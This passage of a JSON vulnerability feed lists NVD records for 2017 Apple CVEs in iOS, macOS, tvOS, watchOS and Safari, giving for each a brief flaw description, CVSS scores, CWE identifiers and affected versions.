"AV:L/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "LOCAL", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2390"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2390", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2390", "cvss": {"score": 2.1, "vector": "AV:L/AC:L/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:29", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"Kernel\" component. 
A race condition allows attackers to execute arbitrary code in a privileged context via a crafted app.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2456", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2456"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2456", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2456", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:50:06", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"Kernel\" component. 
It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (use-after-free) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2472", "cwe": ["CWE-416"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2472"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2472", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2472", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:51:15", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"Kernel\" component. 
A race condition allows attackers to execute arbitrary code in a privileged context via a crafted app.", "cvss3": {"exploitabilityScore": 1.0, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "HIGH", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.0, "vectorString": "CVSS:3.0/AV:L/AC:H/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2478", "cwe": ["CWE-362"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 4.9, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "HIGH", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 7.6, "vectorString": "AV:N/AC:H/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2478"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2478", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2478", "cvss": {"score": 7.6, "vector": "AV:N/AC:H/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:45:57", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to bypass the Same Origin Policy and obtain sensitive information via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:N/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2386", "cwe": ["NVD-CWE-noinfo"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2386"], "modified": "2019-10-03T00:03:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/a:apple:safari:10.0.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2386", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2386", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:P/I:N/A:N"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:59", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2469", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2469"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/a:apple:safari:10.0.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2469", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2469", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:48:55", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"Kernel\" component. 
It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (integer overflow) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2440", "cwe": ["CWE-190"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2440"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2440", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2440", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:36", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2459", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2459"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:tvos:10.1.1", "cpe:/a:apple:safari:10.0.3"], "id": "CVE-2017-2459", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2459", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:06", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to conduct Universal XSS (UXSS) attacks via crafted frame objects.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2445", "cwe": ["CWE-79"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2445"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/a:apple:safari:10.0.3", "cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2445", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2445", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:46:48", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"FontParser\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted font file.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2407", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2407"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2407", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2407", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:50", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2465", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2465"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:tvos:10.1.1", "cpe:/a:apple:safari:10.0.3"], "id": "CVE-2017-2465", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2465", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:17", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"Security\" component. 
It allows attackers to execute arbitrary code in a privileged context or cause a denial of service (buffer overflow) via a crafted app.", "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.8, "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2451", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "HIGH", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 9.3, "vectorString": "AV:N/AC:M/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2451"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:mac_os_x:10.12.3", "cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:watchos:3.1.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2451", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2451", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}, "cpe23": ["cpe:2.3:o:apple:watchos:3.1.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:mac_os_x:10.12.3:*:*:*:*:*:*:*", "cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:27", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2455", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2455"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/o:apple:tvos:10.1.1", "cpe:/a:apple:safari:10.0.3"], "id": "CVE-2017-2455", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2455", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:47", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. Safari before 10.1 is affected. tvOS before 10.2 is affected. The issue involves the \"WebKit\" component. 
It allows remote attackers to execute arbitrary code or cause a denial of service (memory corruption and application crash) via a crafted web site.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 8.8, "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "version": "3.0", "userInteraction": "REQUIRED"}, "impactScore": 5.9}, "published": "2017-04-02T01:59:00", "type": "cve", "title": "CVE-2017-2464", "cwe": ["CWE-119"], "bulletinFamily": "NVD", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2017-2464"], "modified": "2019-03-08T16:06:00", "cpe": ["cpe:/o:apple:iphone_os:10.2.1", "cpe:/a:apple:safari:10.0.3", "cpe:/o:apple:tvos:10.1.1"], "id": "CVE-2017-2464", "href": "https://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2017-2464", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}, "cpe23": ["cpe:2.3:o:apple:tvos:10.1.1:*:*:*:*:*:*:*", "cpe:2.3:o:apple:iphone_os:10.2.1:*:*:*:*:*:*:*", "cpe:2.3:a:apple:safari:10.0.3:*:*:*:*:*:*:*"]}, {"lastseen": "2022-03-23T15:49:15", "description": "An issue was discovered in certain Apple products. iOS before 10.3 is affected. macOS before 10.12.4 is affected. tvOS before 10.2 is affected. watchOS before 3.2 is affected. The issue involves the \"CoreText\" component. 
